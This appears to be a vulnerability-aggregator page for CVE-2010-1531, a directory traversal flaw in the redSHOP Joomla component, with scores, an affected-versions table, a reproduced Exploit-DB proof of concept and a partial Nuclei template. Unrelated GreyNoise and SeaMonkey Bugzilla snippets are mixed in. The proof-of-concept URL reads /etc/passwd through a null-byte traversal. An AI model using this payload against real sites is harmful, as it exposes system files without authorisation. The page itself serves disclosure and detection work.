CVE-2010-1531
published 2010-04-26CVE-2010-1531: Directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot)…
PriorityP353high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
16.91%
96.7th percentile
Directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
Affected
13 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| redcomponent | com_redshop | — | — |
| redcomponent | com_redshop | — | — |
| redcomponent | com_redshop | — | — |
| redcomponent | com_redshop | — | — |
| redcomponent | com_redshop | — | — |
| redcomponent | com_redshop | — | — |
| redcomponent | com_redshop | — | — |
| redcomponent | com_redshop | — | — |
| redcomponent | com_redshop | — | — |
| redcomponent | com_redshop | — | — |
| redcomponent | com_redshop | — | — |
| redcomponent | com_redshop | — | — |
| redcomponent | com_redshop | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component redSHOP 1.0 - Local File Inclusion
exploitdb·2010-04-04
CVE-2010-1531 Joomla! Component redSHOP 1.0 - Local File Inclusion
Joomla! Component redSHOP 1.0 - Local File Inclusion
---
[o] Joomla Component redSHOP Local File Inclusion Vulnerability
Software : com_redshop version 1.0.x [ commercial ]
Vendor : http://redcomponent.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/
[o] Exploit
http://localhost/[path]/index.php?option=com_redshop&view=[LFI]
[o] PoC
http://localhost/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00
[o] Greetz
Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe martfella pizzyroot
H312Y yooogy mousekill }^-^{ noname matthews s4va stardustmemory
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
[o] Iklan Layanan Masyarakat
-irc.******.net- *** Notice -- ander
Nuclei
Joomla! Component redSHOP 1.0 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2010-1531 [HIGH] Joomla! Component redSHOP 1.0 - Local File Inclusion
Joomla! Component redSHOP 1.0 - Local File Inclusion
A directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
Template:
id: CVE-2010-1531
info:
name: Joomla! Component redSHOP 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
remediation: Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://www.expl
Greynoiseio
NoiseLetter September 2025
blogs_greynoiseio
NoiseLetter September 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Bugzilla
CVE-2009-3385 SeaMonkey scriptable plugin execution in mail (mfsa2010-06)
bugzilla·2009-10-21·CVSS 7.1
CVE-2009-3385 [HIGH] CVE-2009-3385 SeaMonkey scriptable plugin execution in mail (mfsa2010-06)
CVE-2009-3385 SeaMonkey scriptable plugin execution in mail (mfsa2010-06)
Mozilla security researcher Georgi Guninski reported that scriptable plugin
content, such as Flash objects, could be loaded and executed in SeaMonkey
mail messages by embedding the content in an iframe inside the message. If
a user were to reply to or forward such a message, malicious JavaScript
embedded in the plugin content could potentially steal the contents of the
message or files from the local filesystem.
Discussion:
Public now via:
http://www.mozilla.org/security/announce/2010/mfsa2010-06.html
---
This issue was corrected in Red Hat Enterprise Linux 3 and 4 via:
https://rhn.redhat.com/errata/RHSA-2009-1531.html
as referenced in the seamonkey.spec:
# fixed in 1.9.0.15
...
Patch378: mozilla-371976-x.pat
http://packetstormsecurity.org/1004-exploits/joomlaredshop-lfi.txthttp://redcomponent.com/redshop/redshop-changeloghttp://secunia.com/advisories/39343http://www.exploit-db.com/exploits/12054http://www.osvdb.org/63535http://www.securityfocus.com/bid/39206https://exchange.xforce.ibmcloud.com/vulnerabilities/57512http://packetstormsecurity.org/1004-exploits/joomlaredshop-lfi.txthttp://redcomponent.com/redshop/redshop-changeloghttp://secunia.com/advisories/39343http://www.exploit-db.com/exploits/12054http://www.osvdb.org/63535http://www.securityfocus.com/bid/39206https://exchange.xforce.ibmcloud.com/vulnerabilities/57512
2010-04-26
Published